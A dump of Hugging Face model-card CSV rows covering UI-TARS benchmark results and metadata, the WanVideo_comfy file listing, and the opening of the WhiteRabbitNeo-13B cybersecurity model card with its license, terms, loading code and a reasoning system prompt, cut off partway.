|
| 170 |
+
| GPT-4o (Aguvis-7B) | 14.8 | 37.1 |
|
| 171 |
+
| GPT-4o (Aguvis-72B) | 17.0 | - |
|
| 172 |
+
| GPT-4o (OS-Atlas-7B) | 14.6 | - |
|
| 173 |
+
| **Agent Model** | | |
|
| 174 |
+
| GPT-4o | 5.0 | 34.5 (SoM) |
|
| 175 |
+
| Gemini-Pro-1.5 | 5.4 | 22.8 (SoM) |
|
| 176 |
+
| Aguvis-72B | 10.3 | 26.1 |
|
| 177 |
+
| Claude Computer-Use | 14.9 (15 steps) | 27.9 |
|
| 178 |
+
| Claude Computer-Use | 22.0 (50 steps) | - |
|
| 179 |
+
| **Our Model** | | |
|
| 180 |
+
| **UI-TARS-7B-SFT** | 17.7 (15 steps) | 33.0 |
|
| 181 |
+
| **UI-TARS-7B-DPO** | 18.7 (15 steps) | - |
|
| 182 |
+
| **UI-TARS-72B-SFT** | 18.8 (15 steps) | **46.6** |
|
| 183 |
+
| **UI-TARS-72B-DPO** | **22.7** (15 steps) | - |
|
| 184 |
+
| **UI-TARS-72B-DPO** | **24.6** (50 steps) | - |
|
| 185 |
+
|
| 186 |
+
|
| 187 |
+
## Citation
|
| 188 |
+
If you find our paper and model useful in your research, feel free to give us a cite.
|
| 189 |
+
|
| 190 |
+
```BibTeX
|
| 191 |
+
@article{qin2025ui,
|
| 192 |
+
title={UI-TARS: Pioneering Automated GUI Interaction with Native Agents},
|
| 193 |
+
author={Qin, Yujia and Ye, Yining and Fang, Junjie and Wang, Haoming and Liang, Shihao and Tian, Shizuo and Zhang, Junda and Li, Jiahao and Li, Yunxin and Huang, Shijue and others},
|
| 194 |
+
journal={arXiv preprint arXiv:2501.12326},
|
| 195 |
+
year={2025}
|
| 196 |
+
}
|
| 197 |
+
```","{""id"": ""ByteDance-Seed/UI-TARS-7B-SFT"", ""author"": ""ByteDance-Seed"", ""sha"": ""3434901a9dd04dd3625617d839a5724fe5e2db20"", ""last_modified"": ""2025-01-25 15:05:42+00:00"", ""created_at"": ""2025-01-20 03:20:33+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 5035, ""downloads_all_time"": null, ""likes"": 167, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""qwen2_vl"", ""image-text-to-text"", ""multimodal"", ""gui"", ""conversational"", ""en"", ""arxiv:2501.12326"", ""license:apache-2.0"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- multimodal\n- gui"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""Qwen2VLForConditionalGeneration""], ""model_type"": ""qwen2_vl"", ""processor_config"": {""chat_template"": ""{% set image_count = namespace(value=0) %}{% set video_count = namespace(value=0) %}{% for message in messages %}{% if loop.first and message['role'] != 'system' %}<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n{% endif %}<|im_start|>{{ message['role'] }}\n{% if message['content'] is string %}{{ message['content'] }}<|im_end|>\n{% else %}{% for content in message['content'] %}{% if content['type'] == 'image' or 'image' in content or 'image_url' in content %}{% set image_count.value = image_count.value + 1 %}{% if add_vision_id %}Picture {{ image_count.value }}: {% endif %}<|vision_start|><|image_pad|><|vision_end|>{% elif content['type'] == 'video' or 'video' in content %}{% set video_count.value = video_count.value + 1 %}{% if add_vision_id %}Video {{ video_count.value }}: {% endif %}<|vision_start|><|video_pad|><|vision_end|>{% elif 'text' in content %}{{ content['text'] }}{% endif %}{% endfor %}<|im_end|>\n{% endif %}{% endfor %}{% if add_generation_prompt %}<|im_start|>assistant\n{% endif %}""}, ""tokenizer_config"": {""bos_token"": null, ""chat_template"": ""{% set image_count = namespace(value=0) %}{% set video_count = namespace(value=0) %}{% for message in messages %}{% if loop.first and message['role'] != 'system' %}<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n{% endif %}<|im_start|>{{ message['role'] }}\n{% if message['content'] is string %}{{ message['content'] }}<|im_end|>\n{% else %}{% for content in message['content'] %}{% if content['type'] == 'image' or 'image' in content or 'image_url' in content %}{% set image_count.value = image_count.value + 1 %}{% if add_vision_id %}Picture {{ image_count.value }}: {% endif %}<|vision_start|><|image_pad|><|vision_end|>{% elif content['type'] == 'video' or 'video' in content %}{% set video_count.value = video_count.value + 1 %}{% if add_vision_id %}Video {{ video_count.value }}: {% endif %}<|vision_start|><|video_pad|><|vision_end|>{% elif 'text' in content %}{{ content['text'] }}{% endif %}{% endfor %}<|im_end|>\n{% endif %}{% endfor %}{% if add_generation_prompt %}<|im_start|>assistant\n{% endif %}"", ""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": null}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='chat_template.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""bytedance-research/UI-TARS"", ""Aheader/gui_test_app"", ""lonnieh81/UI-TARS""], ""safetensors"": {""parameters"": {""F32"": 8291375616}, ""total"": 8291375616}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-25 15:05:42+00:00"", ""cardData"": ""language:\n- en\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- multimodal\n- gui"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""678dc101dd26e0e24c871337"", ""modelId"": ""ByteDance-Seed/UI-TARS-7B-SFT"", ""usedStorage"": 33177002171}",0,,0,,0,"https://huggingface.co/bartowski/UI-TARS-7B-SFT-GGUF, https://huggingface.co/mradermacher/UI-TARS-7B-SFT-GGUF, https://huggingface.co/mradermacher/UI-TARS-7B-SFT-i1-GGUF",3,,0,"Aheader/gui_test_app, bytedance-research/UI-TARS, huggingface/InferenceSupport/discussions/new?title=ByteDance-Seed/UI-TARS-7B-SFT&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BByteDance-Seed%2FUI-TARS-7B-SFT%5D(%2FByteDance-Seed%2FUI-TARS-7B-SFT)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, lonnieh81/UI-TARS",4
|
WanVideo_comfy_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
Kijai/WanVideo_comfy,"Combined and quantized models for WanVideo, originating from here:
|
| 3 |
+
|
| 4 |
+
https://huggingface.co/Wan-AI/
|
| 5 |
+
|
| 6 |
+
Can be used with: https://github.com/kijai/ComfyUI-WanVideoWrapper
|
| 7 |
+
|
| 8 |
+
TinyVAE from https://github.com/madebyollin/taehv","{""id"": ""Kijai/WanVideo_comfy"", ""author"": ""Kijai"", ""sha"": ""91e0f1c593de574e8d4e10f1639dc1d6acc5bf73"", ""last_modified"": ""2025-04-25 13:12:20+00:00"", ""created_at"": ""2025-02-25 17:54:17+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 466, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": null, ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Phantom-Wan-1_3B_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Phantom-Wan-1_3B_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-540P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-540P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-1_3B-540P_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-540P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-540P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-540P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-540P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-540P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1_SkyreelsA2_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='UniAnimate-Wan2.1-14B-Lora-12000-fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2.1-Fun-Control-14B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2.1-Fun-Control-14B_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2.1-Fun-InP-14B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2.1-Fun-InP-14B_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-FLF2V-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-FLF2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-Fun-V1_1-14B-Control_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-480P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-480P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-14B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-14B_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-1_3B_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-1_3B_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-1_3B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_VACE_1_3B_preview_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_VAE_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_VAE_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_kwai_recammaster_1_3B_step20000_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='open-clip-xlm-roberta-large-vit-huge-14_visual_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='open-clip-xlm-roberta-large-vit-huge-14_visual_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='taew2_1.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='umt5-xxl-enc-bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='umt5-xxl-enc-fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-25 13:12:20+00:00"", ""cardData"": null, ""transformersInfo"": null, ""_id"": ""67be03c930eecba21c83a91e"", ""modelId"": ""Kijai/WanVideo_comfy"", ""usedStorage"": 711711251796}",0,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Kijai/WanVideo_comfy&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BKijai%2FWanVideo_comfy%5D(%2FKijai%2FWanVideo_comfy)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
WhiteRabbitNeo-13B-v1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
@@ -0,0 +1,522 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
WhiteRabbitNeo/WhiteRabbitNeo-13B-v1,"---
|
| 3 |
+
license: llama2
|
| 4 |
+
---
|
| 5 |
+
|
| 6 |
+
# Our 33B model is now in beta!
|
| 7 |
+
Access at: https://www.whiterabbitneo.com/
|
| 8 |
+
|
| 9 |
+
# Our Discord Server
|
| 10 |
+
Join us at: https://discord.gg/8Ynkrcbk92 (Updated on Dec 29th. Now permanent link to join)
|
| 11 |
+
|
| 12 |
+
# LLaMA-2 Licence + WhiteRabbitNeo Extended Version
|
| 13 |
+
|
| 14 |
+
# Licence: Usage Restrictions
|
| 15 |
+
|
| 16 |
+
```
|
| 17 |
+
You agree not to use the Model or Derivatives of the Model:
|
| 18 |
+
|
| 19 |
+
- In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
|
| 20 |
+
- For military use in any way;
|
| 21 |
+
- For the purpose of exploiting, harming or attempting to exploit or harm minors in any way;
|
| 22 |
+
- To generate or disseminate verifiably false information and/or content with the purpose of harming others;
|
| 23 |
+
- To generate or disseminate inappropriate content subject to applicable regulatory requirements;
|
| 24 |
+
- To generate or disseminate personal identifiable information without due authorization or for unreasonable use;
|
| 25 |
+
- To defame, disparage or otherwise harass others;
|
| 26 |
+
- For fully automated decision making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
|
| 27 |
+
- For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
|
| 28 |
+
- To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
|
| 29 |
+
- For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
|
| 30 |
+
```
|
| 31 |
+
|
| 32 |
+
# Terms of Use
|
| 33 |
+
By accessing and using this Artificial Intelligence (AI) model, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
|
| 34 |
+
|
| 35 |
+
This AI model is provided ""as is"" and ""as available"" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
|
| 36 |
+
|
| 37 |
+
Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
|
| 38 |
+
|
| 39 |
+
This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
|
| 40 |
+
|
| 41 |
+
# WhiteRabbitNeo
|
| 42 |
+
|
| 43 |
+
<br>
|
| 44 |
+
|
| 45 |
+

|
| 46 |
+
|
| 47 |
+
<br>
|
| 48 |
+
|
| 49 |
+
WhiteRabbitNeo is a model series that can be used for offensive and defensive cybersecurity.
|
| 50 |
+
|
| 51 |
+
This 13B model is getting released as a public preview of its capabilities, and also to assess the societal impact of such an AI.
|
| 52 |
+
|
| 53 |
+
```
|
| 54 |
+
import torch, json
|
| 55 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 56 |
+
|
| 57 |
+
model_path = ""/home/migel/models/WhiteRabbitNeo""
|
| 58 |
+
|
| 59 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 60 |
+
model_path,
|
| 61 |
+
torch_dtype=torch.float16,
|
| 62 |
+
device_map=""auto"",
|
| 63 |
+
load_in_4bit=False,
|
| 64 |
+
load_in_8bit=True,
|
| 65 |
+
trust_remote_code=True,
|
| 66 |
+
)
|
| 67 |
+
|
| 68 |
+
tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
|
| 69 |
+
|
| 70 |
+
|
| 71 |
+
def generate_text(instruction):
|
| 72 |
+
tokens = tokenizer.encode(instruction)
|
| 73 |
+
tokens = torch.LongTensor(tokens).unsqueeze(0)
|
| 74 |
+
tokens = tokens.to(""cuda"")
|
| 75 |
+
|
| 76 |
+
instance = {
|
| 77 |
+
""input_ids"": tokens,
|
| 78 |
+
""top_p"": 1.0,
|
| 79 |
+
""temperature"": 0.5,
|
| 80 |
+
""generate_len"": 1024,
|
| 81 |
+
""top_k"": 50,
|
| 82 |
+
}
|
| 83 |
+
|
| 84 |
+
length = len(tokens[0])
|
| 85 |
+
with torch.no_grad():
|
| 86 |
+
rest = model.generate(
|
| 87 |
+
input_ids=tokens,
|
| 88 |
+
max_length=length + instance[""generate_len""],
|
| 89 |
+
use_cache=True,
|
| 90 |
+
do_sample=True,
|
| 91 |
+
top_p=instance[""top_p""],
|
| 92 |
+
temperature=instance[""temperature""],
|
| 93 |
+
top_k=instance[""top_k""],
|
| 94 |
+
num_return_sequences=1,
|
| 95 |
+
)
|
| 96 |
+
output = rest[0][length:]
|
| 97 |
+
string = tokenizer.decode(output, skip_special_tokens=True)
|
| 98 |
+
answer = string.split(""USER:"")[0].strip()
|
| 99 |
+
return f""{answer}""
|
| 100 |
+
|
| 101 |
+
|
| 102 |
+
tot_system_prompt = """"""
|
| 103 |
+
Answer the Question by exploring multiple reasoning paths as follows:
|
| 104 |
+
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
|
| 105 |
+
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
|
| 106 |
+
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
|
| 107 |
+
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
|
| 108 |
+
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
|
| 109 |
+
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
|
| 110 |
+
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
|
| 111 |
+
